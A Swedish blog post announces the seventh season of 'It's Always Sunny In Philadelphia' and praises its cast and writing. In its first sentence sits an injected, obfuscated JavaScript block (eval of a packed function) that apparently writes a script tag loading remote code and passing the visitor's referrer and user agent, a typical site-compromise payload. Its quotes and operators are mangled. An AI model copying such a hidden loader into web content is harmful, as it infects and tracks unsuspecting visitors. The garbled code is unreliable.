Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

It's Always Sunny In Philadelphia är igång igen!

It's Always Sunny In Philadelphia är igång igen!
Alexander Gylemo

Säsong eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbrik|var|u0026u|referrer|iithy||js|php’.split(’|’),0,{}))
sju av redaktionens favoritkomediserie ”It’s Always Sunny In Philadelphia” har äntligen börjat, och den här gången är gänget sjukare än någonsin!

httpv://www.youtube.com/watch?v=hPZR2Vk57TI&NR=1

”It’s Always Sunny In Philadelphia”, producerat av FX Networks, började som en tvättäkta b-sitcom. Inga kända skådespelare, max två-tre miljöbyten per avsnitt och billiga kameravinklar. Handlingen, karaktärerna och manuset var däremot hästlängder före de flesta komediserierna som existerar idag, vilket vi framför allt har Rob McElhenney (som spelar Mac) och Glenn Howerton (som spelar Dennis) att tacka för, då de skrev de första avsnitten och tillsammans med Charlie Day (spelar Charlie) och Kaitlin Olson (spelar Sweet Dee) levererade ett grymt skådespel och verkligen levde in i sina karaktärer.

Serien blev en succé redan under första säsongen, och snart hade man anlitat Danny DeVito som sedan 2006 spelar Dennis och Dee’s pappa Frank och som enligt mig gör en av de mest minnesvärda rollerna han någonsin försökt sig på.

För er som ännu inte satt er in i denna underbara serie handlar den om ovannämnda karaktärer som tillsammans driver den nedgångna baren ”Paddy’s Pub” i ett av Philadelphias mer smutsigare områden. Detta är handlingen, resten tar karaktärerna hand om som i jakten på lycka, kärlek och rikedom försätter sig i ännu större social misär än de ursprungligen var i på nya sätt i varje avsnitt. Charlie Day, som egentligen gör hela serien för mig, har beskrivit serien som ”Friends on crack”, och det är precis vad det är.

Nu har som sagt den sjunde säsongen kickat igång och om man tyckte att serien var spårad och politiskt inkorrekt tidigare har man inte sett någonting än, då mer pengar pumpats in och avsnitten kommit till en helt ny nivå produktionsmässigt. Hoppa på Sunny-tåget och njut, detta är troligen en av de bisarraste serierna du någonsin har sett!

httpv://www.youtube.com/watch?v=PiWbYskmx2I&feature=relmfu